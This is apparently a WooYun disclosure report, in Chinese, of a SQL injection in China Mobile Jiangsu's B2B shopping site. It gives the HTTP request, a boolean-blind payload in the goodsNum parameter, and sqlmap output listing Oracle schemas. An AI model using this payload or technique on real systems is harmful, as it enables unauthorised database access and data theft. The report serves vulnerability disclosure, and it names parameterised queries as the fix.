当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156025

漏洞标题:中国移动10086.cn某省级站点SQL注入涉及大量数据

相关厂商:中国移动

漏洞作者: greg.wu

提交时间:2015-11-26 14:36

修复时间:2016-01-14 14:54

公开时间:2016-01-14 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

中国移动10086.cn某省级站点SQL注入涉及大量数据

详细说明:

江苏移动b2b商城的注入,oracle数据库,可以直接用sqlmap跑

POST /b2b/actionDispatcher.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/b2b/goods/UUPO-U8.jsp
Content-Length: 88
Cookie: bi-user-id=141309163362895; WT_FPC=id=2e40e16cec67a0884481414484686765:lv=1448563543832:ss=1448563522116; tK1gTQFA2C=MDAwM2IyYThiNjAwMDAwMDAwNjQwQXgvWR0xNDQ4NTM1ODk0; B2B_JSESSIONID=qqrCWW2hTSZvSpZydDDTS1GBYbpr1GN1Sn0h9gT01GR1ndY1vjcB!382508210; __utma=231257732.265260302.1448563524.1448563524.1448563524.1; __utmb=231257**.**.**.**8563524; __utmc=231257732; __utmz=231257732.1448563524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; fpyUjfj0NP=MDAwM2IyYThiNjAwMDAwMDAwMzIwVC9ACVkxNDQ4NTM1OTEz
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01&supplierNum=99100012


goodsNum存在注入。
poc:
goodsNum=JSYD-LENOVO-A278T-01') AND 1363=1363 AND ('1'='1

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: goodsNum
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01') AND 1517=1517 AND ('cKNd'='cKNd&supplierNum=99100012
---
[02:49:10] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP 2.2, Nginx
back-end DBMS: Oracle
[02:49:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:49:10] [INFO] fetching database (schema) names
[02:49:10] [INFO] fetching number of databases
[02:49:10] [INFO] resumed: 4
[02:49:10] [INFO] resumed: KFZXBTB
[02:49:10] [INFO] resumed: SYS
[02:49:10] [INFO] resumed: SYSTEM
[02:49:10] [INFO] resumed: TSMS1
available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
当前库里有659张表,涉及到password字段的表有8张
web application technology: Servlet 3.0, JSP 2.2, Nginx
back-end DBMS: Oracle
[03:02:38] [INFO] fetching tables for database: 'KFZXBTB'
[03:02:38] [INFO] fetching number of tables for database 'KFZXBTB'
[03:02:38] [INFO] retrieved: 659

修复方案:

过滤,参数化

版权声明:转载请注明来源 greg.wu@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-30 14:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无


漏洞评价:

评价